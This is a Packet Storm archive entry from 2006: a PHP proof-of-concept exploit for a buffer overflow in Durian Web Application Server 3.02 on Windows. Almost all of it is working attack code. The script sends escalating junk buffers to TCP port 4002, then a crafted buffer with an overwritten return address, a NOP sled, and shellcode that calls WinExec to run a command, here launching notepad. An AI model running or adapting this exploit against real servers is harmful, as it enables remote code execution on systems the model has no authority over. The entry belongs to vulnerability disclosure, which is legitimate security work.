durian-302-exec.txt

2006-12-29T00:00:00
ID PACKETSTORM:53325
Type packetstorm
Reporter rgod
Modified 2006-12-29T00:00:00

Description

                                        
                                            `<?php  
/*  
Durian Web Application Server 3.02 freeware for Win32 buffer  
overflow execute command exploit  
  
by rgod  
mail: retrog at alice dot it  
site: http://retrogod.altervista.org  
  
tested against xp sp2 ita  
  
software site -> http://sourceforge.net/projects/durian/  
  
*/  
  
error_reporting(E_ALL);  
$address = "192.168.1.3";  
$service_port = "4002";  
  
$shellcode =  
"\xeb\x1b".  
"\x5b".  
"\x31\xc0".  
"\x50".  
"\x31\xc0".  
"\x88\x43\x59".  
"\x53".  
"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d  
"\xff\xd3".  
"\x31\xc0".  
"\x50".  
"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda  
"\xff\xd3".  
"\xe8\xe0\xff\xff\xff".  
"\x63\x6d\x64".  
"\x2e".  
"\x65".  
"\x78\x65".  
"\x20\x2f".  
"\x63\x20".  
"cmd.exe /c start notepad & ";  
  
//$eip="\x72\xe0\xf1\x00";//DEP disabled  
$eip="\x72\xe0\xf2\x00";  
  
$ch =array("\xaa","\xa0","\x41");  
$size=array(30,70,150,330,520,700,1400,2300);  
  
for ($j=0; $j<count($ch); $j++){  
for ($i=0; $i<count($size); $i++){  
$junk="";  
if (($j==2) and ($i==7)){  
$junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX";  
$junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu";  
$junk.=$eip; //jmp shellcode  
for ($n=1; $n<=100; $n++){  
$junk.="\x90";  
}  
$junk.=$shellcode;  
for ($n=1; $n=(2300-strlen($junk)); $n++){  
$junk.="\x90";  
}  
}  
else {  
for ($k=1; $k<=$size[$i]; $k++){  
$junk.=$ch[$j];  
}  
}  
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);  
if ($socket < 0) {  
die("socket_create() failed:\n reason: " . socket_strerror($socket) . "\n");  
}  
$result = socket_connect($socket, $address, $service_port);  
if ($result < 0) {  
die("socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n");  
}  
$in = $junk;  
socket_write($socket, $in, strlen ($in));  
socket_close($socket);  
}  
}  
?>  
  
`